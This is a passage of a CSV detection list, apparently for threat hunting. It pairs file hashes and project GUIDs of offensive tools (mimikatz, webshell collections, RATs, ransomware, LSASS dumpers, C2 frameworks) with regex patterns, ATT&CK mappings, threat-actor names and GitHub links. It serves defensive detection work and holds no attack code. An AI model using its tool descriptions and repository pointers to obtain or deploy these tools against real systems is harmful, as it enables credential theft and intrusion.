"*44ae8a2088ca416ed3c802f50eb55adbbb2d01fd528e76be8dd449004ce470ad*",".{0,1000}44ae8a2088ca416ed3c802f50eb55adbbb2d01fd528e76be8dd449004ce470ad.{0,1000}","offensive_tool_keyword","RottenPotatoNG","perform the RottenPotato attack and get a handle to a privileged token","T1134.001 - T1055.012 - T1547.001","TA0004","N/A","Sandworm","Privilege 
Escalation","https://github.com/breenmachine/RottenPotatoNG","1","0","#filehash","N/A","8","10","935","183","2017-12-29T14:38:47Z","2017-12-29T13:19:03Z","25662" "*44ae9957842a29e354e2a64874bad57eb1790ed15ce345184ee8773c1e380e3a*",".{0,1000}44ae9957842a29e354e2a64874bad57eb1790ed15ce345184ee8773c1e380e3a.{0,1000}","offensive_tool_keyword","Python-Rootkit","full undetectable python RAT which can bypass almost all antivirus and open a backdoor inside any windows machine which will establish a reverse https Metasploit connection to your listening machine","T1100 - T1027 - T1219 - T1560.001 - T1021.005","TA0005 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/0xIslamTaha/Python-Rootkit","1","0","#filehash","N/A","10","10","606","145","2024-10-29T16:56:39Z","2016-06-09T10:49:54Z","25663" "*44b33b5a598a9ad02356ba66221a7270a97ea4ad6f653b64a030e35fabf63e49*",".{0,1000}44b33b5a598a9ad02356ba66221a7270a97ea4ad6f653b64a030e35fabf63e49.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","25664" "*44b40a461af2ad711898a48285e333fbffd459797e4b24b4fde92ddcbb2196ae*",".{0,1000}44b40a461af2ad711898a48285e333fbffd459797e4b24b4fde92ddcbb2196ae.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. 
Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","25665" "*44c00be47b5171d3edde7649c556efd366d1343665be0610c62941091b081e40*",".{0,1000}44c00be47b5171d3edde7649c556efd366d1343665be0610c62941091b081e40.{0,1000}","offensive_tool_keyword","Eventlogedit-evtx--Evolution","","T1070.001 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/3gstudent/Eventlogedit-evtx--Evolution","1","0","#filehash","N/A","9","3","267","62","2021-04-17T01:28:00Z","2018-06-05T01:21:20Z","25666" "*44D0366D-742F-4E0B-A67D-3B1044A66EA7*",".{0,1000}44D0366D\-742F\-4E0B\-A67D\-3B1044A66EA7.{0,1000}","offensive_tool_keyword","SharpFtpC2","A Streamlined FTP-Driven Command and Control Conduit for Interconnecting Remote Systems","T1071.002 - T1105 - T1090.001","TA0011","N/A","N/A","C2","https://github.com/PhrozenIO/SharpFtpC2","1","0","#GUIDproject","N/A","10","10","88","15","2023-11-09T10:37:20Z","2023-06-09T12:41:28Z","25669" "*44d1e4dd465f3d374a0dc3433672aecd70ec9b64ea0e8c59a71a4d9166cc52aa*",".{0,1000}44d1e4dd465f3d374a0dc3433672aecd70ec9b64ea0e8c59a71a4d9166cc52aa.{0,1000}","offensive_tool_keyword","PrivFu","Tool to execute token assigned process","T1055","TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","#filehash","TokenAssignor","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","25670" "*44D5BE95-F34D-4CC5-846F-C7758943B8FA*",".{0,1000}44D5BE95\-F34D\-4CC5\-846F\-C7758943B8FA.{0,1000}","offensive_tool_keyword","Shoggoth","Shoggoth: Asmjit Based Polymorphic Encryptor","T1027 - T1045","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/frkngksl/Shoggoth","1","0","#GUIDproject","N/A","8","8","724","92","2024-04-10T03:04:04Z","2021-12-03T11:55:22Z","25671" 
"*44dc84d80501de4a03c738e7b49825eb6bf402c2278b785eca99277b2bacf2a1*",".{0,1000}44dc84d80501de4a03c738e7b49825eb6bf402c2278b785eca99277b2bacf2a1.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","25672" "*44dd7375f1bd3e113d15aac2634839f6a33b8706f27540f6b098e85866373ed4*",".{0,1000}44dd7375f1bd3e113d15aac2634839f6a33b8706f27540f6b098e85866373ed4.{0,1000}","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0005 - TA0004","N/A","Evilnum","Defense Evasion","https://github.com/hfiref0x/UACME","1","0","#filehash","N/A","10","10","6711","1348","2025-03-09T03:33:26Z","2015-03-28T12:04:33Z","25673" "*44de69934c7cc1b42b995276af916e6a14d8f2170f5de9306ed1e134d8f007de*",".{0,1000}44de69934c7cc1b42b995276af916e6a14d8f2170f5de9306ed1e134d8f007de.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","#filehash","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","25674" "*44e769288f34ec5abca4d42a2ff890bf7e9f00218abce392076682226a74de45*",".{0,1000}44e769288f34ec5abca4d42a2ff890bf7e9f00218abce392076682226a74de45.{0,1000}","offensive_tool_keyword","KrbRelay-SMBServer","acts as an SMB server (instead of DCOM) to relay Kerberos AP-REQ to CIFS or HTTP","T1557 - T1021 - T1205 - T1071","TA0006 - TA0008 - TA0010","N/A","Black Basta","Lateral Movement","https://github.com/decoder-it/KrbRelay-SMBServer","1","0","#filehash","N/A","9","3","215","26","2024-10-08T14:55:59Z","2024-10-05T12:28:55Z","25675" "*44f266ce71ff63b838e83e60572bed76e2419411c3dcceec025fe63788491aaf*",".{0,1000}44f266ce71ff63b838e83e60572bed76e2419411c3dcceec025fe63788491aaf.{0,1000}","offensive_tool_keyword","cliws","Cross platform interactive bind/reverse PTY shell","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Dispossessor","C2","https://github.com/b23r0/cliws","1","0","#filehash","N/A","10","10","159","29","2023-11-06T02:19:16Z","2021-10-24T04:10:07Z","25676" "*44f2d9077535e735d92db431ad39f369175aba9fd5986d0bacd593693dc9498a*",".{0,1000}44f2d9077535e735d92db431ad39f369175aba9fd5986d0bacd593693dc9498a.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 
- TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","25677" "*44f2efa653fa33563cda24247c85a79a7e632e6d94129f53952fc9f90c3ad3aa*",".{0,1000}44f2efa653fa33563cda24247c85a79a7e632e6d94129f53952fc9f90c3ad3aa.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","25678" "*44f6d55e84972a295d82d3e670bd8356fe8fee457e19e9115f26005ffb24f68d*",".{0,1000}44f6d55e84972a295d82d3e670bd8356fe8fee457e19e9115f26005ffb24f68d.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#filehash","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","25680" "*44fad118e1e7776c04d4a8fa8174ff5316ab5fa23b0e58e5c8a15c50f04ed365*",".{0,1000}44fad118e1e7776c04d4a8fa8174ff5316ab5fa23b0e58e5c8a15c50f04ed365.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. 
BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","#filehash","N/A","10","10","2231","405","2025-04-21T03:17:20Z","2017-04-05T17:05:10Z","25681" "*450746e51e6f1369e7e73c5e2122d0ca81153d3a4c7bcec3d66266b15ee547f7*",".{0,1000}450746e51e6f1369e7e73c5e2122d0ca81153d3a4c7bcec3d66266b15ee547f7.{0,1000}","offensive_tool_keyword","webtrufflehog","Browser extension that leverages TruffleHog to scan web traffic in real-time for exposed secrets","T1552.001 - T1040 - T1036 - T1087","TA0006 - TA0007 - TA0009","N/A","N/A","Collection","https://github.com/c3l3si4n/webtrufflehog","1","0","#filehash","N/A","7","2","102","10","2024-12-29T23:26:35Z","2024-12-28T19:53:09Z","25682" "*450bb5ca8c92ffe474f9ec1a48111c7574dd621fd326f9ff0474aabb90b3fbde*",".{0,1000}450bb5ca8c92ffe474f9ec1a48111c7574dd621fd326f9ff0474aabb90b3fbde.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","25684" "*450c54e126cbd38523f6dce014bd30bc95ede55141ffc3360b1dd6989895b28f*",".{0,1000}450c54e126cbd38523f6dce014bd30bc95ede55141ffc3360b1dd6989895b28f.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","#filehash","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","25686" "*4510d8b0d9695f8d29ecc32d96634e68188ea36dbe15cdb26a807c07561ed791*",".{0,1000}4510d8b0d9695f8d29ecc32d96634e68188ea36dbe15cdb26a807c07561ed791.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","25687" "*4516398fb9263307b6632401b89e7a7bc979f6a8efa20492983e02cfd969de30*",".{0,1000}4516398fb9263307b6632401b89e7a7bc979f6a8efa20492983e02cfd969de30.{0,1000}","offensive_tool_keyword","sish","An open source serveo/ngrok alternative. 
HTTP(S)/WS(S)/TCP Tunnels to localhost using only SSH","T1572 - T1090.002","TA0010 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antoniomika/sish","1","0","#filehash","N/A","10","10","4203","325","2025-04-10T20:04:08Z","2019-02-15T15:36:23Z","25689" "*451d10d93c241b86d688cba1b05c7b5ee74995b5b558e11a6a4b114d080f5dce*",".{0,1000}451d10d93c241b86d688cba1b05c7b5ee74995b5b558e11a6a4b114d080f5dce.{0,1000}","offensive_tool_keyword","lolminer","NVIDIA+AMD GPU Miner","T1496","TA0040","N/A","N/A","Cryptomining","https://github.com/Lolliedieb/lolMiner-releases","1","0","#filehash","N/A","9","10","2781","601","2025-02-01T20:03:57Z","2018-10-27T20:35:03Z","25691" "*451d5da48cb04cd5c45c832686019932d528fb51ac0b8ba4ddd4e082291a3bb3*",".{0,1000}451d5da48cb04cd5c45c832686019932d528fb51ac0b8ba4ddd4e082291a3bb3.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","25692" "*4523836f6c7973deaf94d9b78c9cc30b5b3bbc5859cca5eb88ebfb2f566560d5*",".{0,1000}4523836f6c7973deaf94d9b78c9cc30b5b3bbc5859cca5eb88ebfb2f566560d5.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","25694" "*4527b53e515c275e572f307246614ba4fc9152a25dfd2fd712246b321626bac6*",".{0,1000}4527b53e515c275e572f307246614ba4fc9152a25dfd2fd712246b321626bac6.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 
- T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","25696" "*4527ed46e39c8486c0f9d7f48fa7c4ae58a980db49ebcb881c174d88925a551b*",".{0,1000}4527ed46e39c8486c0f9d7f48fa7c4ae58a980db49ebcb881c174d88925a551b.{0,1000}","offensive_tool_keyword","blackvision","Command line Remote Access tool (RAT) for Windows.","T1090 - T1095 - T1008","TA0011","N/A","N/A","Malware","https://github.com/quantumcore/blackvision","1","0","#filehash","N/A","10","1","14","10","2019-09-16T18:32:51Z","2019-07-04T17:32:35Z","25697" "*453485f59e550e5ad903796a7fd65c0e50c0f3977d635f373eddbc3777d70949*",".{0,1000}453485f59e550e5ad903796a7fd65c0e50c0f3977d635f373eddbc3777d70949.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. 
Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","25701" "*453bbd3a1c26955b1ed273f7e206002b49a4a80ba58fbe5ab1b02e4f983c6fba*",".{0,1000}453bbd3a1c26955b1ed273f7e206002b49a4a80ba58fbe5ab1b02e4f983c6fba.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","25703" "*453c30c7c8d6c33e6f699d364016b8bae5ae5378e03e6e9966c17bbe9be9db33*",".{0,1000}453c30c7c8d6c33e6f699d364016b8bae5ae5378e03e6e9966c17bbe9be9db33.{0,1000}","offensive_tool_keyword","PhpSploit","Full-featured C2 framework which silently persists on webserver via evil PHP oneliner","T1505.003 - T1505 - T1059 - T1219 - T1547","TA0003 - TA0011 - TA0005","N/A","N/A","C2","https://github.com/nil0x42/phpsploit","1","0","#filehash","N/A","10","10","2331","453","2024-05-06T13:49:14Z","2014-05-21T19:43:03Z","25704" "*453c7fcdf6fdf446f846057eb2cd90b495caaf442aa07dbeb9655482809fef43*",".{0,1000}453c7fcdf6fdf446f846057eb2cd90b495caaf442aa07dbeb9655482809fef43.{0,1000}","offensive_tool_keyword","AMSITrigger","AMSITrigger will identify all of the malicious strings in a powershell file by repeatedly making calls to AMSI using AMSIScanBuffer - line by line. 
On receiving an AMSI_RESULT_DETECTED response code the line will then be scrutinised to identify the individual triggers","T1059.001 - T1218.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/RythmStick/AMSITrigger","1","0","#filehash","https://www.rythmstick.net/posts/amsitrigger/","10","10","1195","166","2022-08-21T22:37:23Z","2020-05-27T09:17:19Z","25705" "*454711d2a1a5526d75e2df5ba08bd0a1a1e5833efc59bbe6b41e31b7c32e8e76*",".{0,1000}454711d2a1a5526d75e2df5ba08bd0a1a1e5833efc59bbe6b41e31b7c32e8e76.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","25706" "*45480e4a4de392608ab151ba8c1586f5a65319c976fbfa0f9f5f0ab72bad76df*",".{0,1000}45480e4a4de392608ab151ba8c1586f5a65319c976fbfa0f9f5f0ab72bad76df.{0,1000}","offensive_tool_keyword","GonnaCry","a linux ransomware","T1486 - T1059 - T1020 - T1083 - T1070","TA0040 - TA0005 - TA0009 - 
TA0010","N/A","N/A","Ransomware","https://github.com/tarcisio-marinho/GonnaCry","1","0","#filehash #linux","N/A","10","8","717","402","2025-01-24T13:39:57Z","2017-05-12T23:46:28Z","25707" "*4549092826ddbd01de6a9d05e0146ca12544e98ed832cb9308dc8d11c4a987d8*",".{0,1000}4549092826ddbd01de6a9d05e0146ca12544e98ed832cb9308dc8d11c4a987d8.{0,1000}","offensive_tool_keyword","antSword","cross-platform website management toolkit - abused by attackers - supports the use of web shells","T1505.003 - T1059 - T1100 - T1027 - T1219 - T1071","TA0002 - TA0003 - TA0005 - TA0011","antSword webshell","APT41 - APT15","C2","https://github.com/AntSwordProject/antSword","1","0","#filehash","N/A","10","10","4010","616","2025-01-20T12:48:42Z","2016-03-11T09:28:00Z","25708" "*4551264b08c24e9acf8b38695d3334c9870c5b5a7f88b3d3a69d8eed0b6c927f*",".{0,1000}4551264b08c24e9acf8b38695d3334c9870c5b5a7f88b3d3a69d8eed0b6c927f.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","25710" "*4551550ffe88fdd08a358197d4e3da663bca78d6896484bbf081cb70b794f27b*",".{0,1000}4551550ffe88fdd08a358197d4e3da663bca78d6896484bbf081cb70b794f27b.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","25711" "*45570458c8065fd92b833dbf89ed9777f7326a6802cb0b25b7b499e486411e52*",".{0,1000}45570458c8065fd92b833dbf89ed9777f7326a6802cb0b25b7b499e486411e52.{0,1000}","offensive_tool_keyword","webshell","collection of 
webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","25712" "*455944be49563e9e917624046e1d638743d7579238f28456fff1ea9b7c21ae28*",".{0,1000}455944be49563e9e917624046e1d638743d7579238f28456fff1ea9b7c21ae28.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","25713" "*455a5ed5b8aca163fd8bbc11a06de8b652517c50a32c634f33a6a093d47e3d4e*",".{0,1000}455a5ed5b8aca163fd8bbc11a06de8b652517c50a32c634f33a6a093d47e3d4e.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","#filehash","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","25714" "*455a614b6dd52b17b4af639045bd0c3c3ddad152334607978ec9e915553246e9*",".{0,1000}455a614b6dd52b17b4af639045bd0c3c3ddad152334607978ec9e915553246e9.{0,1000}","offensive_tool_keyword","go-lsass","dumping LSASS process remotely","T1003 - T1055 - T1021.005","TA0006 - TA0008 - TA0009","N/A","N/A","Credential Access","https://github.com/jfjallid/go-lsass","1","0","#filehash","N/A","9","1","38","5","2024-07-27T10:35:12Z","2023-11-30T18:45:51Z","25715" "*4563bdbbc58eb60d27a45341223221e593db4873f378a3b018f86998187debe7*",".{0,1000}4563bdbbc58eb60d27a45341223221e593db4873f378a3b018f86998187debe7.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","25716" "*4569687f2dd096f8559b0b2a3710ffe1f6a7374f6439e2d8559a29f33289ef62*",".{0,1000}4569687f2dd096f8559b0b2a3710ffe1f6a7374f6439e2d8559a29f33289ef62.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","25717" "*456a99ccb18c638425add933b1ae1fcef59cb064aa97dc0be231d16c35bddff0*",".{0,1000}456a99ccb18c638425add933b1ae1fcef59cb064aa97dc0be231d16c35bddff0.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","25718" "*457026969789119712188521674e7eb3a1cb4ab5e121b6ba80515090eea71d27*",".{0,1000}457026969789119712188521674e7eb3a1cb4ab5e121b6ba80515090eea71d27.{0,1000}","offensive_tool_keyword","Invoke-ArgFuscator","generate obfuscated command-lines for common system-native executables","T1027 - 
T1059 - T1202","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/wietze/Invoke-ArgFuscator","1","0","#filehash","N/A","10","2","161","28","2025-04-14T21:24:29Z","2022-11-20T17:59:23Z","25719" "*457357c2ae6877a930e6d7e13fab96a5f45465bc8b0d8af41663d31c27943fbe*",".{0,1000}457357c2ae6877a930e6d7e13fab96a5f45465bc8b0d8af41663d31c27943fbe.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","25721" "*45787955618ba3211b89021ddf23ecc5d2b55397a006190455c4070dad964572*",".{0,1000}45787955618ba3211b89021ddf23ecc5d2b55397a006190455c4070dad964572.{0,1000}","offensive_tool_keyword","LatLoader","PoC module to demonstrate automated lateral movement with the Havoc C2 framework","T1570 - T1071 - T1021 - T1563 - T1105","TA0008 - TA0011 - TA0002 - TA0010","N/A","N/A","Lateral Movement","https://github.com/icyguider/LatLoader","1","0","#filehash","N/A","9","4","301","35","2023-12-09T00:28:32Z","2023-10-06T15:03:17Z","25723" "*45793979bc26536a779c1975d9adb745944894941760f1a73f5127e964853c3c*",".{0,1000}45793979bc26536a779c1975d9adb745944894941760f1a73f5127e964853c3c.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","25724" "*457cd41fbb528812aa51bc4b31fce042cdf736281b162181d91c47733d0e9e4b*",".{0,1000}457cd41fbb528812aa51bc4b31fce042cdf736281b162181d91c47733d0e9e4b.{0,1000}","offensive_tool_keyword","Keethief","Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the 
